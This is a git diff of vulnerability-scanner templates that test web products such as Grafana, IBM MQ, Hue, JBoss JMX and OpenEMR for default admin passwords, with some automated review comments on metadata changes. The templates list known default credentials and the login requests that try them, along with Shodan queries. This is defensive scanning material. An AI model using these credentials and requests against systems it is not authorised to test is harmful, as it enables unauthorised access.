@@ -1,14 +1,12 @@ id: druid-default-login - info: name: Apache Druid Default Login author: pikpikcu severity: high description: Apache Druid default login information (admin/admin) was discovered. - tags: druid,default-login classification: cwe-id: CWE-798 - + tags: druid,default-login requests: - raw: - | @@ -16,27 +14,22 @@ requests: Host: {{Hostname}} loginUsername={{username}}&loginPassword={{password}} - - | POST /submitLogin HTTP/1.1 Host: {{Hostname}} loginUsername={{username}}&loginPassword={{password}} - payloads: username: - admin password: - admin attack: pitchfork - matchers-condition: and matchers: - - type: status status: - 200 - - type: regex regex: - "^success$" diff --git a/poc/default/emqx-default-login-7222.yaml b/poc/default/emqx-default-login-7222.yaml index 5b55f228e5..792fb8c64b 100644 --- a/poc/default/emqx-default-login-7222.yaml +++ b/poc/default/emqx-default-login-7222.yaml @@ -1,18 +1,17 @@ id: emqx-default-login - info: name: Emqx Default Admin Login author: For3stCo1d severity: high description: Emqx default admin credentials were discovered. + metadata: + shodan-query: 'http.favicon.hash:"-670975485"' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.favicon.hash:"-670975485" tags: emqx,default-login - requests: - raw: - | @@ -21,14 +20,12 @@ requests: Content-Type: application/x-www-form-urlencoded {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - admin pass: - public - matchers: - type: dsl dsl: diff --git a/poc/default/exacqvision-default-login-7277.yaml b/poc/default/exacqvision-default-login-7277.yaml index 1109a7cae7..872006f74d 100644 --- a/poc/default/exacqvision-default-login-7277.yaml +++ b/poc/default/exacqvision-default-login-7277.yaml 
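Review bot: The `classification` block of emqx-default-login-7222.yaml gains a bare `cve-id:` with no value, which YAML loads as null rather than as an absent field. The same empty key is added in huawei-hg532e-default-router-login-8064.yaml, hue-default-credential-8081.yaml, ibm-mqseries-default-login-8107.yaml, idemia-biometrics-default-login.yaml and mofi4500-default-login.yaml. How the consuming scanner or report exporter treats a null here is not visible in the diff, but these are default-credential checks with no CVE, so the line carries no information. I would delete it and leave `cwe-id: CWE-522` directly under `cvss-score: 8.3`.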
@@ -4,11 +4,10 @@ info: author: ELSFA7110 severity: high description: ExacqVision Web Service default login credentials (admin/admin256) were discovered. - reference: - - https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf + tags: exacqvision,default-login + reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf classification: cwe-id: cwe-798 - tags: exacqvision,default-login requests: - raw: - | diff --git a/poc/default/frp-default-login-7557.yaml b/poc/default/frp-default-login-7557.yaml index 2dc240d633..601e60ca39 100644 --- a/poc/default/frp-default-login-7557.yaml +++ b/poc/default/frp-default-login-7557.yaml @@ -1,35 +1,34 @@ id: frp-default-login - info: - name: Frp Default Login + name: FRP Default Login author: pikpikcu severity: high + description: FRP default login credentials were discovered. tags: frp,default-login reference: https://github.com/fatedier/frp/issues/1840 - + classification: + cwe-id: CWE-798 requests: - raw: - | GET /api/proxy/tcp HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} - payloads: username: - admin password: - admin attack: pitchfork - matchers-condition: and matchers: - - type: word words: - "proxies" part: body condition: and - - type: status status: - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/poc/default/glpi-default-login-7732.yaml b/poc/default/glpi-default-login-7732.yaml index 1e3a558f53..63857480c0 100644 --- a/poc/default/glpi-default-login-7732.yaml +++ b/poc/default/glpi-default-login-7732.yaml 
@@ -1,24 +1,18 @@ id: glpi-default-login - info: name: GLPI Default Login author: andysvints severity: high + tags: glpi,default-login description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. - reference: - - https://glpi-project.org/ + reference: https://glpi-project.org/ classification: cwe-id: CWE-798 - tags: glpi,default-login - metadata: - max-request: 2 - -http: +requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /front/login.php HTTP/1.1 Host: {{Hostname}} @@ -27,14 +21,12 @@ http: Referer: {{BaseURL}} {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} - attack: pitchfork payloads: user: - glpi pass: - glpi - extractors: - type: regex name: token @@ -43,7 +35,6 @@ http: group: 1 regex: - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\"" - - type: regex name: name part: body @@ -51,7 +42,6 @@ http: group: 1 regex: - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" - - type: regex name: password part: body @@ -59,14 +49,12 @@ http: group: 1 regex: - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" - cookie-reuse: true matchers-condition: and matchers: - type: word words: - 'GLPI - Standard Interface' - - type: status status: - 200 diff --git a/poc/default/grafana-default-login.yaml b/poc/default/grafana-default-login.yaml index c6f47b7acd..bb4f3051fc 100644 --- a/poc/default/grafana-default-login.yaml +++ b/poc/default/grafana-default-login.yaml 
@@ -2,19 +2,11 @@ id: grafana-default-login info: name: Grafana Default Login - author: pdteam + author: d3sca severity: high - description: Grafana default admin login credentials were detected. - reference: - - https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection - - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - - https://github.com/grafana/grafana/issues/14755 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: grafana,default-login + requests: - raw: - | @@ -40,16 +32,14 @@ requests: matchers: - type: word words: - - "grafana_session" # Login cookie + - "grafana_session" # Login cookie part: header - type: word part: body words: - - "Logged in" # Logged in keyword + - "Logged in" # Logged in keyword - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/default/huawei-hg532e-default-router-login-8064.yaml b/poc/default/huawei-hg532e-default-router-login-8064.yaml index e29e927d84..2ebc7ab348 100644 --- a/poc/default/huawei-hg532e-default-router-login-8064.yaml +++ b/poc/default/huawei-hg532e-default-router-login-8064.yaml @@ -1,16 +1,17 @@ id: huawei-HG532e-default-login info: name: Huawei HG532e Default Credential + description: Huawei HG532e default admin credentials were discovered. author: pussycat0x severity: high - description: Huawei HG532e default admin credentials were discovered. + metadata: + shodan-query: http.html:"HG532e" + tags: default-login,huawei classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.html:"HG532e" - tags: default-login,huawei requests: - raw: - | diff --git a/poc/default/hue-default-credential-8081.yaml b/poc/default/hue-default-credential-8081.yaml index 21ca20ec17..f401f97a57 100644 
--- a/poc/default/hue-default-credential-8081.yaml +++ b/poc/default/hue-default-credential-8081.yaml @@ -1,22 +1,19 @@ id: hue-default-credential - info: name: Cloudera Hue Default Admin Login author: For3stCo1d severity: high description: Cloudera Hue default admin credentials were discovered. - reference: - - https://github.com/cloudera/hue + reference: https://github.com/cloudera/hue + metadata: + shodan-query: title:"Hue - Welcome to Hue" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - max-request: 8 - shodan-query: title:"Hue - Welcome to Hue" tags: hue,default-login,oss,cloudera - -http: +requests: - raw: - | GET /hue/accounts/login?next=/ HTTP/1.1 @@ -27,7 +24,6 @@ http: Content-Type: application/x-www-form-urlencoded csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F - attack: pitchfork payloads: user: @@ -41,7 +37,6 @@ http: - hadoop - cloudera cookie-reuse: true - extractors: - type: regex name: csrfmiddlewaretoken @@ -52,18 +47,16 @@ http: - name='csrfmiddlewaretoken' value='(.+?)' req-condition: true stop-at-first-match: true - matchers-condition: and matchers: - type: dsl dsl: - contains(tolower(body_1), 'welcome to hue') - - contains(tolower(header_2), 'csrftoken=') - - contains(tolower(header_2), 'sessionid=') + - contains(tolower(all_headers_2), 'csrftoken=') + - contains(tolower(all_headers_2), 'sessionid=') condition: and - - type: status status: - 302 -# digest: 4b0a00483046022100ab2304e0e2a848bbb9420d4e07e1d72d6f404762a010aa7ceaebeee04c0d59e7022100ccaae94d492ac6eb9aa70f8b99e0c8bd207663ce90a74ffff0c3aff1da463798:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/28 diff --git a/poc/default/ibm-mqseries-default-login-8107.yaml b/poc/default/ibm-mqseries-default-login-8107.yaml index 78424d3229..765cde99f4 100644 --- a/poc/default/ibm-mqseries-default-login-8107.yaml 
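Review bot: hue-default-credential-8081.yaml ends up as an older, unsigned revision of the template. The last hunk replaces the `# digest:` signature trailer with `# Enhanced by mp on 2022/03/28`, and the earlier hunks go back from `http:` to `requests:` and from `header_2` to `all_headers_2`. Whether the scanner version that consumes this repository still defines `all_headers_2` cannot be told from the diff; if it does not, the DSL matcher never fires and default credentials go undetected. Unless the rollback is deliberate, I would keep the newer lines, e.g. `- contains(tolower(header_2), 'csrftoken=')`, together with the signed trailer. The patch header lists the author as "GitHub Action", so a sync job preferring a stale source is the likely cause and worth checking.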
+++ b/poc/default/ibm-mqseries-default-login-8107.yaml 
@@ -1,44 +1,46 @@ -id: ibm-mqseries-default-login - -info: - name: IBM MQSeries web console default login - author: righettod - severity: high - description: The remote host is running IBM MQ and REST API and is using default credentials. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. - tags: ibm,default-login - reference: - - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd - - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL - -requests: - - raw: - - | - POST /ibmmq/console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/ibmmq/console/login.html - - j_username={{username}}&j_password={{password}} - - attack: pitchfork - payloads: - username: - - admin - - app - - mqadmin - password: - - passw0rd - - passw0rd - - mqadmin - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "LtpaToken2_" - - - type: status - status: - - 302 \ No newline at end of file +id: ibm-mqseries-default-login +info: + name: IBM MQSeries Web Console Default Login + author: righettod + severity: high + description: IBM MQ and REST API default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. 
+ tags: ibm,default-login + reference: + - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd + - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /ibmmq/console/j_security_check HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/ibmmq/console/login.html + + j_username={{username}}&j_password={{password}} + attack: pitchfork + payloads: + username: + - admin + - app + - mqadmin + password: + - passw0rd + - passw0rd + - mqadmin + matchers-condition: and + matchers: + - type: word + part: header + words: + - "LtpaToken2_" + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/default/idemia-biometrics-default-login.yaml b/poc/default/idemia-biometrics-default-login.yaml index 1a7ffa1347..edd899c586 100644 --- a/poc/default/idemia-biometrics-default-login.yaml +++ b/poc/default/idemia-biometrics-default-login.yaml @@ -2,10 +2,15 @@ id: idemia-biometrics-default-login info: name: IDEMIA BIOMetrics Default Login author: Techryptic (@Tech) - severity: high - description: Default Login of password=12345 on IDEMIA BIOMetrics application. + severity: medium + description: IDEMIA BIOMetrics application default login credentials were discovered. reference: https://www.google.com/search?q=idemia+password%3D+"12345" tags: idemia,biometrics,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -31,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/default/iptime-default-login-8192.yaml b/poc/default/iptime-default-login-8192.yaml index a03c2cf675..d6a42f5490 100644 --- a/poc/default/iptime-default-login-8192.yaml 
+++ b/poc/default/iptime-default-login-8192.yaml @@ -1,16 +1,11 @@ id: iptime-default-login + info: name: ipTIME Default Login author: gy741 severity: high - description: ipTIME default admin credentials were discovered. - reference: - - https://www.freewebtools.com/IPTIME/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: iptime,default-login + requests: - raw: - | @@ -19,17 +14,20 @@ requests: Referer: {{BaseURL}}/sess-bin/login_session.cgi username={{username}}&passwd={{password}} + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "setCookie" @@ -37,5 +35,3 @@ requests: - "login.cgi" part: body condition: and - -# Enhanced by mp on 2022/03/10 diff --git a/poc/default/jinher-oa-default-login-8311.yaml b/poc/default/jinher-oa-default-login-8311.yaml index 84e1e87e9b..6be5f643d2 100644 --- a/poc/default/jinher-oa-default-login-8311.yaml +++ b/poc/default/jinher-oa-default-login-8311.yaml @@ -1,15 +1,11 @@ id: jinher-oa-default-login info: - name: Jinher-OA C6 - Default Admin Discovery + name: Jinher oa C6 Default Password author: ritikchaddha severity: high - description: Jinher-OA C6 default admin credentials were discovered. + description: Jinher-OA C6 default administrator account credential. reference: - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: jinher,default-login requests: - raw: @@ -40,5 +36,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/poc/default/jmx-default-login-8354.yaml b/poc/default/jmx-default-login-8354.yaml index ddf2035a6c..a0f36dca9e 100644 --- a/poc/default/jmx-default-login-8354.yaml +++ b/poc/default/jmx-default-login-8354.yaml 
@@ -1,4 +1,5 @@ id: jmx-default-login + info: name: JBoss JMX Console Weak Credential Discovery author: paradessia @@ -11,12 +12,20 @@ info: cvss-score: 8.3 cwe-id: CWE-522 tags: jboss,jmx,default-login -requests: + metadata: + max-request: 28 + +http: - raw: + - | + GET /jmx-console/ HTTP/1.1 + Host: {{Hostname}} + - | GET /jmx-console/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(user + ':' + pass)}} + attack: clusterbomb payloads: user: @@ -30,13 +39,16 @@ requests: - 123456789 - 123qwe - root + + req-condition: true matchers-condition: and matchers: + - type: dsl + dsl: + - "!contains(body_1, 'JMImplementation') && contains(body_2, 'JMImplementation')" + - type: status status: - 200 - - type: word - words: - - 'JMImplementation' # Enhanced by mp on 2022/03/10 diff --git a/poc/default/lighttpd-default-8627.yaml b/poc/default/lighttpd-default-8627.yaml index 9038df8198..deeb3bf63f 100644 --- a/poc/default/lighttpd-default-8627.yaml +++ b/poc/default/lighttpd-default-8627.yaml @@ -1,19 +1,27 @@ id: lighttpd-default + info: name: lighttpd Default Page author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Powered+by+lighttpd%22 - tags: tech -requests: + metadata: + max-request: 1 + shodan-query: http.title:"Powered by lighttpd" + tags: tech,lighttpd + +http: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - "Powered by lighttpd" + - type: status status: - 200 + +# digest: 490a0046304402207bfb53ff74c8a5d2164ebdb801345b5d3b8f3888967a5ecdc711bd142f5f7bcd02203e2391d3e9dff05fd2ed8001470a60b1ac2fc4dfd7c61e2039b6cdd4263652fd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/lutron-iot-default-login.yaml b/poc/default/lutron-iot-default-login.yaml index 71fd122838..9f80864342 100644 --- a/poc/default/lutron-iot-default-login.yaml +++ b/poc/default/lutron-iot-default-login.yaml 
@@ -5,6 +5,7 @@ info: reference: https://www.lutron.com author: geeknik severity: high + tags: iot,default-login,lutron,panel requests: - method: GET @@ -19,10 +20,12 @@ requests: - ">DeviceIP" - ">Get Database Info as XML" condition: and + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/poc/default/mantisbt-default-credential-8779.yaml b/poc/default/mantisbt-default-credential-8779.yaml index 329e2e16cb..17ceea9753 100644 --- a/poc/default/mantisbt-default-credential-8779.yaml +++ b/poc/default/mantisbt-default-credential-8779.yaml 
@@ -2,52 +2,45 @@ id: mantisbt-default-credential info: name: MantisBT Default Admin Login - author: YashVardhanTripathi + author: For3stCo1d severity: high - description: A MantisBT default admin login dsicovery template. - -http: - - method: GET - path: - - "{{BaseURL}}/mantis/login_page.php" - - redirects: true - - extractors: - - type: regex - name: somesome - group: 1 - part: header - regex: - - "PHPSESSID=([a-zA-Z0-9]+);" + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"MantisBT" + tags: mantisbt,default-login +requests: - raw: - | - POST /mantis/login_password_page.php HTTP/1.1 + POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Cookie: MANTIS_secure_session=1; PHPSESSID={{somesome}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate, br - Connection: close - Upgrade-Insecure-Requests: 1 - return=index.php&username={{pewpew}}&password={{password}}&secure_session=on + return=index.php&username={{user}}&password={{pass}} + attack: pitchfork payloads: - pewpew: + user: - administrator - password: + pass: - root - attack: pitchfork + matchers-condition: and matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'mantis_secure_session') + - contains(tolower(all_headers), 'mantis_string_cookie') + condition: and + - type: status status: - 302 - - type: regex - part: header - regex: - - "Location: .*?/login_cookie_test.php\\?return=account_page.php" + +# Enhanced by mp on 2022/03/22 
diff --git a/poc/default/mofi4500-default-login.yaml b/poc/default/mofi4500-default-login.yaml index 31203a5587..e010d8ca58 100644 --- a/poc/default/mofi4500-default-login.yaml +++ b/poc/default/mofi4500-default-login.yaml @@ -3,14 +3,15 @@ info: name: MOFI4500-4GXeLTE-V2 Default Login author: pikpikcu severity: high + tags: mofi,default-login description: Mofi Network MOFI4500-4GXELTE wireless router default admin credentials were discovered. reference: - https://www.cleancss.com/router-default/Mofi_Network/MOFI4500-4GXELTE classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: mofi,default-login requests: - raw: - | diff --git a/poc/default/nagios-default-login.yaml b/poc/default/nagios-default-login.yaml index f0af19260e..e1982ba865 100644 --- a/poc/default/nagios-default-login.yaml +++ b/poc/default/nagios-default-login.yaml @@ -11,7 +11,6 @@ requests: GET /nagios/side.php HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} - payloads: username: - nagiosadmin @@ -20,13 +19,11 @@ requests: - nagiosadmin - nagiosxi attack: pitchfork - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - 'Current Status' diff --git a/poc/default/netsus-default-login.yaml b/poc/default/netsus-default-login.yaml index adee76136b..95c1ae4a93 100644 --- a/poc/default/netsus-default-login.yaml +++ b/poc/default/netsus-default-login.yaml @@ -3,8 +3,13 @@ info: name: NetSUS Server Default Login author: princechaddha severity: high + description: NetSUS Server default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: - shodan-query: 'http.title:"NetSUS Server Login"' + shodan-query: http.title:"NetSUS Server Login" tags: netsus,default-login requests: - raw: 
@@ -31,3 +36,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/default/nexus-default-password.yaml b/poc/default/nexus-default-password.yaml index 06f9b87d3e..8cde0421ba 100644 --- a/poc/default/nexus-default-password.yaml +++ b/poc/default/nexus-default-password.yaml @@ -1,9 +1,11 @@ id: nexus-default-password + info: name: Nexus Default Password author: pikpikcu severity: high tags: nexus,default-login + requests: - raw: - | @@ -15,6 +17,7 @@ requests: Connection: close username=YWRtaW4%3D&password=YWRtaW4xMjM%3D + matchers-condition: and matchers: - type: status diff --git a/poc/default/nps-default-password.yaml b/poc/default/nps-default-password.yaml index d3ade09bfa..64d356618f 100644 --- a/poc/default/nps-default-password.yaml +++ b/poc/default/nps-default-password.yaml @@ -1,11 +1,9 @@ id: nps-default-password - info: name: NPS Default Password author: pikpikcu severity: high tags: nps,default-login - requests: - method: POST path: @@ -14,7 +12,6 @@ requests: headers: Content-Type: application/x-www-form-urlencoded Referer: "{{Hostname}}/login/index" - matchers-condition: and matchers: - type: word diff --git a/poc/default/octobercms-default-login.yaml b/poc/default/octobercms-default-login.yaml index ac7530cfa6..a6822af271 100644 --- a/poc/default/octobercms-default-login.yaml +++ b/poc/default/octobercms-default-login.yaml 
@@ -1,25 +1,26 @@ id: octobercms-default-login - info: - name: OctoberCMS Default Login + name: OctoberCMS - Default Admin Discovery author: princechaddha severity: high - description: OctoberCMS default administrator account credential. + description: OctoberCMS default admin credentials were discovered. reference: - https://github.com/octobercms/october - https://octobercms.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: http.component:"October CMS" tags: octobercms,default-login,oss - requests: - raw: - | GET /backend/backend/auth/signin HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /backend/backend/auth/signin HTTP/1.1 Host: {{Hostname}} @@ -27,7 +28,6 @@ requests: Content-Type: application/x-www-form-urlencoded _token={{token}}&postback=1&login={{username}}&password={{password}} - cookie-reuse: true attack: clusterbomb payloads: @@ -36,7 +36,6 @@ requests: password: - admin - "" - matchers-condition: and matchers: - type: word @@ -45,11 +44,9 @@ requests: - "october_session=" - "admin_auth=" condition: and - - type: status status: - 302 - extractors: - type: regex part: body @@ -58,3 +55,5 @@ requests: group: 1 regex: - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' + +# Enhanced by mp on 2022/07/15 diff --git a/poc/default/ofbiz-default-login-9210.yaml b/poc/default/ofbiz-default-login-9210.yaml index 266b9cb6b3..a7ee2e5601 100644 --- a/poc/default/ofbiz-default-login-9210.yaml +++ b/poc/default/ofbiz-default-login-9210.yaml 
@@ -1,19 +1,9 @@ id: ofbiz-default-login - info: name: Apache OfBiz Default Login author: pdteam - description: Apache OfBiz default admin credentials were discovered. severity: medium tags: ofbiz,default-login,apache - reference: - - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - requests: - raw: - | @@ -22,19 +12,15 @@ requests: Content-Type: application/x-www-form-urlencoded USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y - payloads: username: - admin password: - ofbiz attack: pitchfork - matchers: - type: word words: - "ofbiz-pagination-template" - "Powered by OFBiz" condition: and - -# Enhanced by mp on 2022/03/10 diff --git a/poc/default/openemr-default-login.yaml b/poc/default/openemr-default-login.yaml index 5a08aa24f2..0d2f25a536 100644 --- a/poc/default/openemr-default-login.yaml +++ b/poc/default/openemr-default-login.yaml @@ -1,9 +1,8 @@ id: openemr-default-login - info: - name: OpenEMR Default Login + name: OpenEMR - Default Admin Discovery author: Geekby - description: OpenEMR default login was discovered. + description: OpenEMR default admin credentials were discovered. severity: high reference: - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image @@ -15,7 +14,6 @@ info: fofa-query: app="OpenEMR" shodan-query: http.html:"OpenEMR" tags: openemr,default-login - requests: - raw: - | @@ -24,14 +22,12 @@ requests: Content-Type: application/x-www-form-urlencoded new_login_session_management=1&languageChoice=1&authUser={{user}}&clearPass={{pass}}&languageChoice=10 - attack: pitchfork payloads: user: - admin pass: - pass - matchers-condition: and matchers: - type: word 
@@ -40,7 +36,8 @@ requests: - "main.php?token_main=" - "OpenEMR" condition: and - - type: status status: - 302 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/default/rancher-default-login.yaml b/poc/default/rancher-default-login.yaml index d189f6d141..5c29f0c69b 100644 --- a/poc/default/rancher-default-login.yaml +++ b/poc/default/rancher-default-login.yaml @@ -7,11 +7,12 @@ info: reference: - https://github.com/rancher/rancher - https://rancher.com/docs/rancher/v2.5/en/admin-settings/authentication/local/ + tags: default-login,rancher,kubernetes,devops,cloud classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: default-login,rancher,kubernetes,devops,cloud requests: - raw: - | diff --git a/poc/default/rockmongo-default-credentials.yaml b/poc/default/rockmongo-default-credentials.yaml index 2e2ec7b575..000d75a278 100644 --- a/poc/default/rockmongo-default-credentials.yaml +++ b/poc/default/rockmongo-default-credentials.yaml @@ -1,11 +1,9 @@ id: rockmongo-default-credentials - info: name: Rockmongo Default Credentials author: pikpikcu severity: high tags: rockmongo,default-login - requests: - raw: - | @@ -16,16 +14,13 @@ requests: Referer: {{Hostname}}/index.php?action=login.index more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3 - matchers-condition: and matchers: - - type: word words: - "Location: /index.php?action=admin.index&host=0" - "Set-Cookie: ROCK_LANG=" part: header - - type: status status: - 302 diff --git a/poc/default/rockmongo-default-login.yaml b/poc/default/rockmongo-default-login.yaml index c194ac4f25..d1164252a3 100644 --- a/poc/default/rockmongo-default-login.yaml +++ b/poc/default/rockmongo-default-login.yaml 
@@ -4,13 +4,14 @@ info: author: pikpikcu severity: high description: Rockmongo default admin credentials were discovered. + tags: rockmongo,default-login reference: - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: rockmongo,default-login requests: - raw: - | diff --git a/poc/default/showdoc-default-login-10221.yaml b/poc/default/showdoc-default-login-10221.yaml index 3c79212154..056d562bcb 100644 --- a/poc/default/showdoc-default-login-10221.yaml +++ b/poc/default/showdoc-default-login-10221.yaml @@ -4,18 +4,11 @@ info: name: Showdoc Default Login author: pikpikcu severity: medium - description: Showdoc default credentials were discovered. reference: - https://blog.star7th.com/2016/05/2007.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cwe-id: CWE-522 tags: showdoc,default-login - metadata: - max-request: 1 -http: +requests: - raw: - | POST /server/index.php?s=/api/user/login HTTP/1.1 @@ -43,5 +36,3 @@ http: - type: status status: - 200 - -# Enhanced by mp on 2022/03/11 diff --git a/poc/default/spectracom-default-login.yaml b/poc/default/spectracom-default-login.yaml index c3b83c4f09..07b09fe30a 100644 --- a/poc/default/spectracom-default-login.yaml +++ b/poc/default/spectracom-default-login.yaml @@ -1,17 +1,11 @@ id: spectracom-default-login + info: name: Spectracom Default Login author: madrobot - severity: high - description: Spectracom default admin credentials were discovered. + severity: medium tags: spectracom,default-login - reference: - - https://orolia.com/manuals/NC/Content/NC_and_SS/Com/Topics/ADMIN/Passwords.htm - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + requests: - raw: - | 
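Review bot: This revision of showdoc-default-login removes `description` and the whole `classification` block (CVSS vector, score 5.8, `cwe-id: CWE-522`), so a finding from the template arrives with only a name and a severity to triage on. It also swaps `http:` back to the older `requests:` key. If the older revision has to be kept for compatibility, I would at least retain `classification:` with `cwe-id: CWE-522` and the one-line description. The wso2, zabbix and csrfguard hunks later in this patch strip their classification in the same way.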
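Review bot: In spectracom-default-login the severity drops from `high` to `medium` in the same change that deletes the CVSS 8.3 / CWE-522 classification, while the zabbix hunk further down raises the same kind of finding from `high` to `critical`. The default-login templates in this patch that keep that classification stay at `high`, so the set no longer rates one class of finding consistently. I would keep `severity: high` in both files, or record the reason for the difference in a comment beside the field. The request body continues outside this hunk.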
